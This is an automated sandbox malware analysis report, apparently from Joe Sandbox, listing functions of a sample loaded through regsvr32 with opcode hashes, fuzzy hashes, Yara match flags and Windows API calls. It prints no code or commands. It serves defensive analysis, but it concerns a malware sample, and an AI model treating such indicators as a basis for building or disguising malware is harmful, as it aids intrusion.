                                                                      • Opcode ID: b49a52df605eb860e81aecf945551c905b422740176ff48a34f4eb53aef691de
                                                                      • Instruction ID: 0c4797edc4d68ad41c9bd9b72ab1fdb4d18c339664a662d4c0b4ded2861e2ff4
                                                                      • Opcode Fuzzy Hash: b49a52df605eb860e81aecf945551c905b422740176ff48a34f4eb53aef691de
                                                                      • Instruction Fuzzy Hash: B6A16322B1868181EB649F259A557BEA392EB86BC4F48C136DE4D5BE4DCF7CE4019300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526AEB60 Relevance: .2, Instructions: 202COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d9410001777fc81e6582bcbf2c9e1b051a8f1f2b874c05684980e9ac5d71aab9
                                                                      • Instruction ID: 721d2d90ccb0b87a5a2bd2795c87ec510544ff674bf926817391bac9c10dbac5
                                                                      • Opcode Fuzzy Hash: d9410001777fc81e6582bcbf2c9e1b051a8f1f2b874c05684980e9ac5d71aab9
                                                                      • Instruction Fuzzy Hash: A871CE72F181428BE31C8B18ED5567866D6E7E6304F5CC035DA0E8AFD9EBB9F9009B00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180018598 Relevance: .2, Instructions: 197COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5d0a71211182b7f87b6da8fb5c4bb16c050ce1c1bc57c3eb72ccfc764dcd8f25
                                                                      • Instruction ID: 8540b9e78b3a5a21de6b0995fa07f246b5a6616f24314d9c292e70c997d69f1a
                                                                      • Opcode Fuzzy Hash: 5d0a71211182b7f87b6da8fb5c4bb16c050ce1c1bc57c3eb72ccfc764dcd8f25
                                                                      • Instruction Fuzzy Hash: 03916670904B0D8BDF48DF94C48A1EEBBF1FB48358F15821DE84AA7250DB749A89CF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000F7E0 Relevance: .2, Instructions: 156COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: efccbdecd07d61b7fd9807909e593046fc70b22fd17ef27bebbdee29ceef9f7a
                                                                      • Instruction ID: b4cc55b2ba55f7836136ac8b5ed3643aad821ec95d31101853fef74eb9d9cec8
                                                                      • Opcode Fuzzy Hash: efccbdecd07d61b7fd9807909e593046fc70b22fd17ef27bebbdee29ceef9f7a
                                                                      • Instruction Fuzzy Hash: FF51787090470DABDBA9CF64C4893EEBBF0FB48354F60806DE85697390DB749A85CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018001DBE8 Relevance: .2, Instructions: 153COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1505da822373411ddcecd725c63ebafe53e843356a51ddc09aa4b8a95d314011
                                                                      • Instruction ID: 8a210f576f06192acb1348665dce29b8299704b90f8c36c4c02948eefca36544
                                                                      • Opcode Fuzzy Hash: 1505da822373411ddcecd725c63ebafe53e843356a51ddc09aa4b8a95d314011
                                                                      • Instruction Fuzzy Hash: 98819EB590034E8FCB48CF68C48A5DE7FB0BB68394F614219F8569A260D774DAA5CFC4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180019300 Relevance: .1, Instructions: 129COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 197fc001b9ca96d8c078894440fafc4def679aa452f545048d4dbe605d0ae04d
                                                                      • Instruction ID: a715a821166c3325a5f96f2d5301173626eb48cd37bd72c2dcb4fea3562e42b3
                                                                      • Opcode Fuzzy Hash: 197fc001b9ca96d8c078894440fafc4def679aa452f545048d4dbe605d0ae04d
                                                                      • Instruction Fuzzy Hash: 79512EB150074A8BDB49DF28C0D76AE3FE1EB64388F20411DFD468A295D774DAA9CBC1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018001CD38 Relevance: .1, Instructions: 124COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f7aced778150c02bbca5db0e3f41738242a846810a111e238ccae7171f94d46c
                                                                      • Instruction ID: fc479b7e82b21315ffd406d8fba444b33d09de74539f70da2a8813263b1569c5
                                                                      • Opcode Fuzzy Hash: f7aced778150c02bbca5db0e3f41738242a846810a111e238ccae7171f94d46c
                                                                      • Instruction Fuzzy Hash: 65416D7020DB488FD768DF18948975ABBF0FB9A740F404A9DE5CAC7256D771D844CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800197A0 Relevance: .1, Instructions: 118COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 97ae2c8ea2cdf4840b91f894fd37a694475120081486fc145809f74360d0bada
                                                                      • Instruction ID: dbb4fad0742d9b29c59b9a64f17438fc1cba9462e735a4e3b2d00d7b8da19945
                                                                      • Opcode Fuzzy Hash: 97ae2c8ea2cdf4840b91f894fd37a694475120081486fc145809f74360d0bada
                                                                      • Instruction Fuzzy Hash: 4C5192B490038E8FCB48CF69C84A5DE7BB1FB48358F104A19FC26A6250D7B4D665CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180008AD8 Relevance: .1, Instructions: 107COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f1b44f26b2e4c7e97ddfb81a3adbda3d77288edc4ecbe0bae8cc8933f1c33e44
                                                                      • Instruction ID: 08efbb833ea687ad733901112953304226336fcfa3581264405f9509991f6ff4
                                                                      • Opcode Fuzzy Hash: f1b44f26b2e4c7e97ddfb81a3adbda3d77288edc4ecbe0bae8cc8933f1c33e44
                                                                      • Instruction Fuzzy Hash: 6551BEB490074A8BCB48CF68D4875DE7FB0FB68398F20421DEC56AA250D3B496A5CFD4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180009F5C Relevance: .1, Instructions: 107COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16eb5be53274359ca32061ddf2fd9752b6767c1a5dd3248deb14ec1aa5e29bf1
                                                                      • Instruction ID: 52c1f8436ada09c5d91cc0f6a0e49c089501cc81ef075f7e28a52ff611ebfcf9
                                                                      • Opcode Fuzzy Hash: 16eb5be53274359ca32061ddf2fd9752b6767c1a5dd3248deb14ec1aa5e29bf1
                                                                      • Instruction Fuzzy Hash: D351B3B190438E8FCB48DF68D98A5DE7BB0FB48348F104A19FC26A6250D3B4D664CF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000F917 Relevance: .1, Instructions: 99COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bcde6b28aa1f9cc532f581acc23668cd4c3c6920105dcd3780d199daaa58310a
                                                                      • Instruction ID: 871f118089c9e262c63038bd4f0fd9666d89e9c6fa6f13266ea976bdce614408
                                                                      • Opcode Fuzzy Hash: bcde6b28aa1f9cc532f581acc23668cd4c3c6920105dcd3780d199daaa58310a
                                                                      • Instruction Fuzzy Hash: CB41393190071DABDB95CFA4C8892EEBBF1FF44358F608159E852A7384DBB49685CF81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180019E78 Relevance: .1, Instructions: 94COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: be6c09d37bb88d9ef1cd1e4f7c6fe28a3503fab801bd979a9297db1a45dede51
                                                                      • Instruction ID: 72cb41ac5f9990f9c197b8bd4b5430fc958a2c545255f7632808fe9bc15cd904
                                                                      • Opcode Fuzzy Hash: be6c09d37bb88d9ef1cd1e4f7c6fe28a3503fab801bd979a9297db1a45dede51
                                                                      • Instruction Fuzzy Hash: A141D27090034A8BCB48DF68D8865DE7FB0FB58388F20461DE81AA6350D3B896A5CBD5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180001FE0 Relevance: .1, Instructions: 94COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 937cbbccdfb62f32f5a53fbe7826fb6fdb7ed657b014fade726fdd4e8827f138
                                                                      • Instruction ID: 5a85513126e01a98bb902dccfe4af02f6196fd3989a765a33a65cbdcda0cb452
                                                                      • Opcode Fuzzy Hash: 937cbbccdfb62f32f5a53fbe7826fb6fdb7ed657b014fade726fdd4e8827f138
                                                                      • Instruction Fuzzy Hash: 0641E5B091038A8FCF88DF64D84A5DE7BB0FB58358F104A1DFC65A6250E3B49664CF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180015CB0 Relevance: .1, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 17a73d98c2b5216e6ebfe3da59b71ff0bc58f6e68d4a2580613c8fab7b77e503
                                                                      • Instruction ID: 77361ced58272e7b73a95c704b243c92926a81ca7bf4620d616fd1e275fcbc28
                                                                      • Opcode Fuzzy Hash: 17a73d98c2b5216e6ebfe3da59b71ff0bc58f6e68d4a2580613c8fab7b77e503
                                                                      • Instruction Fuzzy Hash: A841D2B190434E8FCB48DF68C4865DE7FF0FB58388F204219E859A6250D3B896A5CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526AA77C Relevance: .1, Instructions: 85COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _getptd
                                                                      • String ID:
                                                                      • API String ID: 3186804695-0
                                                                      • Opcode ID: 07c06ba19e2310f742034fc51624b2b683580184b74621a532736302abba6d70
                                                                      • Instruction ID: 081e6f78cc0eb86ee038db03eb552b4559d61768b0effbca83dfb88b7109122a
                                                                      • Opcode Fuzzy Hash: 07c06ba19e2310f742034fc51624b2b683580184b74621a532736302abba6d70
                                                                      • Instruction Fuzzy Hash: 85319222A1478185EB55DF2AD9193AE67E1EB96BC0F1C8136EA4D07B9ADF7CD401C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000C4B4 Relevance: .1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d3646060d8cb761d7de136982460322f3472e8f5a21e87ad1ead63779f29ae52
                                                                      • Instruction ID: 4f2f4704f2b9e1c234c275d0f4f9a14eb4d491f2b4b6dbd4d57755e8fe2c6edd
                                                                      • Opcode Fuzzy Hash: d3646060d8cb761d7de136982460322f3472e8f5a21e87ad1ead63779f29ae52
                                                                      • Instruction Fuzzy Hash: 6341C4B090438ECFCF48CF68C8895CE7BB0FF58358F114A19E825A6250D3B49665CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800157D8 Relevance: .1, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1d53fd4730f7ea41163b882b7fe0da69ca66e61df5fc81e281dc4420083e2c61
                                                                      • Instruction ID: 4854a602bbf38c78d9fab67e5db6ce586c5dff59e36b89151347ba9907d49bba
                                                                      • Opcode Fuzzy Hash: 1d53fd4730f7ea41163b882b7fe0da69ca66e61df5fc81e281dc4420083e2c61
                                                                      • Instruction Fuzzy Hash: D13189B0529781ABD78CDF28C49981EBBE1FBC8344FC46A2DF9868B350D7749405CB46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018001F944 Relevance: .1, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 213fcaffb4d8b257d73b1e87ee3d57575e303918952cee2d1b890f97e83a5388
                                                                      • Instruction ID: a8885bbbd8deb659e28c33910928e4ea9ad8e802d57f0785ac04cb05f9903a21
                                                                      • Opcode Fuzzy Hash: 213fcaffb4d8b257d73b1e87ee3d57575e303918952cee2d1b890f97e83a5388
                                                                      • Instruction Fuzzy Hash: 802160B0528784AFC398DF28D49981ABBF1FB89344F806A1DF98687350E374D459CB43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800124B4 Relevance: .1, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 789a1fcad167e99ddc40482d8caf18e48711ae2075d057cfa5242344ff1b2506
                                                                      • Instruction ID: 3e7ffcddda8d873ed620f17f9684606eb13d1dd5f0b21141b7977a2e64531d07
                                                                      • Opcode Fuzzy Hash: 789a1fcad167e99ddc40482d8caf18e48711ae2075d057cfa5242344ff1b2506
                                                                      • Instruction Fuzzy Hash: AF217F74529780AFC788DF29C08981EBBE1FB99748F806A1DF88697354D375D445CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800141C0 Relevance: .0, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 825ba780bde58c245e7a1d3728ec0527652b1ee71a04877d42e2af350f08e315
                                                                      • Instruction ID: 85e8bde3e512593198615bb83ad7c533a741442781c438c8658c5734f088230b
                                                                      • Opcode Fuzzy Hash: 825ba780bde58c245e7a1d3728ec0527652b1ee71a04877d42e2af350f08e315
                                                                      • Instruction Fuzzy Hash: AA2148B4508384CBD349DF29D05951BBBE0BB8D75CF900B1DF4CAAB264D7789644CB0A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526ADF20 Relevance: .0, Instructions: 7COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d7cc4962d52e3e4a2947f3a3b752558ec936755315000d7411880e05df0ff2ae
                                                                      • Instruction ID: 31e01f45c713dc53011a3f17b413d36fcd31e311751187b63a9368d251abd1c4
                                                                      • Opcode Fuzzy Hash: d7cc4962d52e3e4a2947f3a3b752558ec936755315000d7411880e05df0ff2ae
                                                                      • Instruction Fuzzy Hash: 18B09B6570C75445876547075C0451555D2F79DBD460440349D0D53F58D93CD6404740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A98A4 Relevance: 53.8, APIs: 43, Instructions: 94COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: free$ErrorFreeHeapLast_errno
                                                                      • String ID:
                                                                      • API String ID: 1012874770-0
                                                                      • Opcode ID: b5d5b29a13da0feaba005b5cdbb38ef60d3e58c86b165e4530729409fd253580
                                                                      • Instruction ID: f4d8d64b296e8f8db532022ca49bc61f0fb6ca92e7f86abb539a3076a585fba9
                                                                      • Opcode Fuzzy Hash: b5d5b29a13da0feaba005b5cdbb38ef60d3e58c86b165e4530729409fd253580
                                                                      • Instruction Fuzzy Hash: 88419422E154C1C1EA68EBA1DD532BC53E0EF85B44F08A071DB4D4ADAACF95D865D350
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526AD0B8 Relevance: 36.9, APIs: 15, Strings: 6, Instructions: 130libraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD0F5
                                                                      • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD111
                                                                      • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD139
                                                                      • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD142
                                                                      • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD158
                                                                      • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD161
                                                                      • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD177
                                                                      • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD180
                                                                      • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD19E
                                                                      • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD1A7
                                                                      • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD1D9
                                                                      • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD1E8
                                                                      • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD240
                                                                      • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD260
                                                                      • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD279
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: Pointer$AddressDecodeProc$Encode$LibraryLoad
                                                                      • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                      • API String ID: 3085332118-232180764
                                                                      • Opcode ID: 3571919baaed57aa13675d85a49604ff28a57139c9f79241176628fa60ae3818
                                                                      • Instruction ID: 82eb1ae415e23d3b8cae84c90ac8dbc88632e2e59d4bedde1bb17daf0d81b241
                                                                      • Opcode Fuzzy Hash: 3571919baaed57aa13675d85a49604ff28a57139c9f79241176628fa60ae3818
                                                                      • Instruction Fuzzy Hash: 3C51B521A5AB42C0FE65AB52AC9417463D0EF47B80F4C8435DD4E46FADEFBCE586D201
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526B028C Relevance: 21.3, APIs: 14, Instructions: 348COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CompareStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFA526B07CE), ref: 00007FFA526B02F9
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFA526B07CE), ref: 00007FFA526B030D
                                                                      • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFA526B07CE), ref: 00007FFA526B0410
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
